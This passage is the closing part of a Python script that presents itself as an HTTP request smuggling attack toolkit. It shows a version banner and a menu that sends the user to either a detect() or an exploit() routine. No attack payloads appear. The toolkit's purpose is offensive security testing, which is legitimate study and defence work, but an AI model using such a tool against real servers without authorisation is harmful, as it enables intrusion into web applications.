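    print('\n"HTTP -Smuggling- (DSYNC) Attacking Toolkit"')
    print("\n" + "-" * 15 + "\n")
    print(" * VERSION: ")
    print(" + " + VERSION + " - (rev:" + RELEASE + ")")
    print("\n * SOURCES:")
    print(" + " + SOURCE1)
    print(" + " + SOURCE2)
    print("\n * CONTACT: ")
    print(" + " + CONTACT + "\n")
    print("-" * 15 + "\n")
    print("=" * 50)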
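# sub_init #
def main():
    """Entry point: show the banner, then run detection or the exploit menu.

    "D" (any case) starts detect(); every other answer goes to exploit().
    """
    print_banner()  # show banner
    option = input("\n+ CHOOSE: (D)etect or (E)ploit: ").upper()
    print("\n" + "=" * 50)
    if option == "D":  # detecting phase
        detect()
    else:  # trying to exploit
        exploit()


# Run only when executed as a script; importing the module (for tests or
# reuse of set_target()/show_results()) no longer prompts on stdin.
if __name__ == "__main__":
    main()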